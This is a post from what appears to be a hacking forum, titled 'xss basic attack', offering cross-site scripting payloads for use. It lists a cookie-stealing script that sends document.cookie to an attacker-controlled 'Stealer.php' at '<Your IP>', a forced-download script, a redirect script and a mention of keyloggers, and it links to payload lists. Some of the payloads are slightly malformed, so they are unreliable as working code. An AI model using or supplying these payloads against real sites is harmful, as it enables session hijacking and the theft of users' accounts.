xss basic attack | General Hacking | Crax

Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  • We are in solidarity with our brothers and sisters in Palestine. Free Palestine. To learn more visit this Page

  • Crax.Pro domain has been taken down!

    Alternatives: Craxpro.io | Craxpro.com

xss basic attack

xss basic attack

LV
1
 

percnlean

Member
Joined
Apr 3, 2023
Threads
12
Likes
3
Awards
4
Credits
2,892©
Cash
0$

-XSS

-


Ex.
----

-Basic xss attacks:
ex.
*Cookie Stealing XSS: <script>document.write('<img
src="http://<Your IP>/Stealer.php?cookie=' %2B document.cookie
%2B '" >');<script>

*Forcing the Download of a File: <script>var link =
document.createElement('a'); link.href =
'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = ''; document.body.appendChild(link); link.click();
</script>

*Redirecting User: <script>window.location =
"
";</script>

*Other Scripts to Enable Key Loggers, Take Pictures, and More
c#category=capture

----

-2 good resources to help you get started:
*https://github.com/foospidy/payloads/tree/master/other/xss
*https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

----

[/REPLY]​
 
  • Like
Reactions: Faucet94

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top Bottom